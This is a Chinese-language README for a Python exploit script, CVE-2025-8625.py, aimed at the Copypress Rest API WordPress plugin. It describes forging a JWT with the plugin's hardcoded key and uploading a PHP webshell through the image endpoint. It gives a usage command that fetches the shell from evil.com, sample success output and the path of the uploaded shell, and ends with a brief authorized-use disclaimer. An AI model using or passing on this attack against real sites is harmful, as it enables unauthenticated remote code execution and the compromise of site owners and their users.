Copypress Rest API 1.1 - 1.2 - 缺少可配置的 JWT 密钥和文件类型验证,导致未经身份验证的远程代码执行
WordPress 的 Copypress Rest API 插件(版本 1.1 至 1.2)通过 copyreap_handle_image() 函数存在 远程代码执行 漏洞。
当未设置密钥时,该插件使用硬编码的 JWT 签名密钥,并且不验证文件类型,从而允许未经身份验证的攻击者伪造令牌,并通过图像处理端点上传任意文件(例如 PHP webshell)。
脚本名称: CVE-2025-8625.py
这个 Python 脚本可自动化利用该漏洞,允许你生成有效的 JWT、发送精心构造的请求,并将恶意文件(webshell)上传到存在漏洞的 WordPress 站点。
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
-u / --url:目标 WordPress 站点 URL-shell / --shell:你的 webshell 或恶意 PHP 文件的直接链接示例输出:
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
Shell 上传成功!🎉
Shell 路径示例:
https://target.com/wp-content/uploads/2025/10/shell.php
该工具仅用于教育和授权的渗透测试目的。
在未经明确许可的情况下对目标进行使用是违法的。
作者:Nxploited (Khaled Alenazi)